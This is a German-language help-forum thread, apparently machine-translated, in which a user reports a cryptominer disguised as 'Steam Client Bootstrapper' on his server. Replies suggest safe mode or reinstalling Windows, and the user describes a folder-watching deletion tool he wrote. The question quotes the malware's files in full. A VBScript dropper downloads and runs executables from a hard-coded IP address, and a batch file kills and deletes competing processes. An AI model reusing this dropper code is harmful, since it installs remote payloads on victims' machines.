So beenden Sie Steam-Client-Bootstrapper dauerhaft

3750
Yuriy Zaletskyy

Ich habe folgende Situation in meinem Aufgabenmanager:

Task Manager - Prozesse

Ich weiß nicht, um was für eine App es sich handelt, aber definitiv keinen Steam-Client-Bootstrapper, da ich ihn nicht installiert habe und auch nicht deinstallieren kann.

Wenn ich versuche herauszufinden, welche Art von App es ist, gehen Sie folgendermaßen vor:

Task-Manager - Details aufrufen

Ich sehe so etwas:

Task Manager - Details

In MS Config Utility habe ich nichts gefunden, was aussieht secury.exe.

Wenn ich den Speicherort der Datei öffne, sehe ich drei Dateien:

m.bat, b.exe, 4.vbs.

Nachfolgend geht der Inhalt von m.bat:

taskkill /f /t /im secury.exe c:\ProgramData\secury.exe taskkill /f /t /im kingsoft.exe taskkill /f /t /im expl0rer.exe taskkill /f /t /im ieplare.exev taskkill /f /t /im nssm.exe taskkill /f /t /im MSASCui.exe taskkill /f /t /im SystemSettlngs.exe taskkill /f /t /im SystemSetting.exe taskkill /f /t /im Process.exe taskkill /f /t /im winlnlt.exe taskkill /f /t /im WindowsUpgrade.exe taskkill /f /t /im msdc.exe taskkill /f /t /im Fiddlere.exe taskkill /f /t /im shovst.exe taskkill /f /t /im lqrtqe.exe taskkill /f /t /im apkls.exe taskkill /f /t /im winlog.exe taskkill /f /t /im svchosts.exe taskkill /f /t /im win1ogins.exe taskkill /f /t /im shovsts.exe taskkill /f /t /im fcty.exe taskkill /f /t /im soiuos.exe taskkill /f /t /im TrustedInstaller.exe del C:\Windows\System32\soiuos.exe del C:\Windows\Setup\TrustedInstaller.exe del C:\ProgramData\kingsoft.exe del C:\ProgramData\expl0rer.exe del C:\ProgramData\ieplare.exe del C:\ProgramData\nssm.exe del C:\ProgramData\MSASCui.exe del C:\ProgramData\SystemSettlngs.exe del C:\ProgramData\SystemSetting.exe del C:\ProgramData\Process.exe del C:\ProgramData\winlnlt.exe del C:\ProgramData\WindowsUpgrade.exe del C:\ProgramData\msdc.exe del C:\ProgramData\Fiddlere.exe del C:\ProgramData\shovst.exe del C:\ProgramData\lqrtqe.exe del C:\ProgramData\apkls.exe del C:\ProgramData\winlog.exe del C:\ProgramData\svchosts.exe del C:\ProgramData\win1ogins.exe del C:\ProgramData\shovsts.exe del C:\ProgramData\fcty.exe del C:\ProgramData\pool.exe del C:\ProgramData\pool2.exe del C:\ProgramData\pool3.exe

Weiter geht es 4.vbs:

Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/2.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\s2.exe",2 Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\pool2.exe",2 CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe" CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"

Was kann ich tun, um die secury.exeRechenleistung meines Servers nicht zu missbrauchen?

PS: Ich habe eine vollständige Avast-Überprüfung meines Computers durchgeführt, aber es wurde nichts gefunden.

0
Das ... sieht sehr verdächtig aus (der Inhalt dieser Batchdateien und der VBS). Gibt es eine Chance, dass Sie in den abgesicherten Modus wechseln (und hoffentlich läuft das Ding nicht) und können Sie dann versuchen, sie zu löschen? Wenn der abgesicherte Modus keine Option ist - booten Sie von einem externen Laufwerk (oder Linux LiveUSB / LiveCD) und mit der Festplatte erreichbar - diese Dateien löschen? Darius vor 6 Jahren 0
An dieser Stelle sollten Sie davon ausgehen, dass Ihr Computer vollständig gefährdet ist. Sie könnten eine Reihe von Virenprüfprogrammen ausführen und dafür beten, dass sie funktioniert haben. Ich würde jedoch empfehlen, alles Wichtige zu sichern und anschließend Windows zu formatieren und erneut zu installieren. Richard vor 6 Jahren 1
Ich habe diese Dateien viele Male gelöscht, aber es hat nicht funktioniert Yuriy Zaletskyy vor 6 Jahren 0

1 Antwort auf die Frage

0
Yuriy Zaletskyy

Ich möchte eine Problemumgehung mitteilen, die ich für mein Problem gefunden habe.

Als Programmierer habe ich ein Programm erstellt, das den Ordner ständig c:\ProgramData\auf neue Dateien überwacht . Wenn in diesem Ordner einige der Dateien angezeigt werden, die zu "Steam Client Bootstrappper" gehören, löscht mein Programm diese Dateien, bevor sie ausgeführt werden. Wenn jemand dieses Dienstprogramm ändern muss, finden Sie es bei GitHub .

Nachdem ich diesen primitiven Antivirus (eigentlich AntiPUP) ausgeführt habe, ist mein System nicht mehr langsam. Ein weiteres Detail, das erforderlich ist, damit dieses Programm mit Stabilität arbeiten kann, ist die Anforderung des Ordnerkastens c:\ProgramData\copyForVirus\. Ich habe das Programm erstellt, um eine Kopie dieser Virendateien zu erstellen, um sie später in einer weiteren VM Ware-Umgebung auf das Innere dieser Dateien zu analysieren.

Verwandte Probleme